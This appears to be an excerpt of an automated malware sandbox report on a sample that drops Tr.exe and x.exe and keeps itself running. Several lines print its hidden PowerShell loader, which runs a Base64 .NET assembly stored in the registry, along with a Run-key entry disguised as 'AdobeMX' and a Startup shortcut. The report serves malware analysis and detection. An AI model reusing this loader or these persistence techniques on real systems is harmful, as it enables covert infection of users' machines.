        Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: rpcrtremote.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
        Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: devrtl.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: wow64win.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: wow64cpu.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{35786D3C-B075-49B9-88DD-029876E11C01}\InProcServer32Jump to behavior
        Source: Microsoft.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Temp\x.exe
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: ._cache_1.exeStatic file information: File size 1178304 > 1048576

        Data Obfuscation

        barindex
        Source: 9.2.powershell.exe.2770000.0.raw.unpack, K4pNDLld8Rw0wdfmtZ.cs.Net Code: TH7j5ZAl9 System.Reflection.Assembly.Load(byte[])
        Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, K4pNDLld8Rw0wdfmtZ.cs.Net Code: TH7j5ZAl9 System.Reflection.Assembly.Load(byte[])
        Source: unknownProcess created: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
        Source: unknownProcess created: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
        Source: x.exe.0.drStatic PE information: real checksum: 0xa961f should be: 0x12293c
        Source: ._cache_1.exeStatic PE information: real checksum: 0xa961f should be: 0x12293c
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AE8AC5 push ecx; ret 1_2_00AE8AD8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FE93D7022D push eax; iretd 4_2_000007FE93D70241
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FE93D700BD pushad ; iretd 4_2_000007FE93D700C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_000007FE93D7245D push eax; iretd 4_2_000007FE93D72471
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003AC590 push eax; retn 003Ah12_2_003AC599
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003C8AC5 push ecx; ret 12_2_003C8AD8
        Source: 9.2.powershell.exe.2770000.0.raw.unpack, K4pNDLld8Rw0wdfmtZ.csHigh entropy of concatenated method names: 'pFCMYGNqY', 'r4kYVPjGi', 'M6ftBDHZb', 'ywblfFXwp', 'Gpi7NbQNc', 'YASRYeyES', 'vfWIc4pND', 'od8NRw0wd', 'FmtAZa9H2', 'OAeWd0rmP'
        Source: 9.2.powershell.exe.2770000.0.raw.unpack, A8v5UCNLAwXBSCX02v.csHigh entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'VwBYpLi450', 'nEGw0M2gN8Uyq', 'HF4MQKv6J3', 'ItNMuY1NiO', 'MSaMqN1AXA', 'PcgMdHtN53', 'DI3MkE5MCW', 'xIpMedHv7k', 'rTtMjkwu5r'
        Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, K4pNDLld8Rw0wdfmtZ.csHigh entropy of concatenated method names: 'pFCMYGNqY', 'r4kYVPjGi', 'M6ftBDHZb', 'ywblfFXwp', 'Gpi7NbQNc', 'YASRYeyES', 'vfWIc4pND', 'od8NRw0wd', 'FmtAZa9H2', 'OAeWd0rmP'
        Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, A8v5UCNLAwXBSCX02v.csHigh entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'VwBYpLi450', 'nEGw0M2gN8Uyq', 'HF4MQKv6J3', 'ItNMuY1NiO', 'MSaMqN1AXA', 'PcgMdHtN53', 'DI3MkE5MCW', 'xIpMedHv7k', 'rTtMjkwu5r'
        Source: C:\Users\user\Desktop\._cache_1.exeFile created: C:\Users\user\AppData\Local\Temp\Tr.exeJump to dropped file
        Source: C:\Users\user\Desktop\._cache_1.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file

        Boot Survival

        barindex
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeMXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeMX C:\Windows\System32\cmd.exe /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)Jump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.lnkJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.lnkJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeMXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeMXJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
        Source: C:\Users\user\Desktop\._cache_1.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,1_2_00AC4A35
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00B453DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,1_2_00B453DF
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_003A4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_003A4A35
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 12_2_004253DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,12_2_004253DF
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeCode function: 1_2_00AE3307 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00AE3307
        Source: C:\Users\user\Desktop\._cache_1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\._cache_1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Tr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
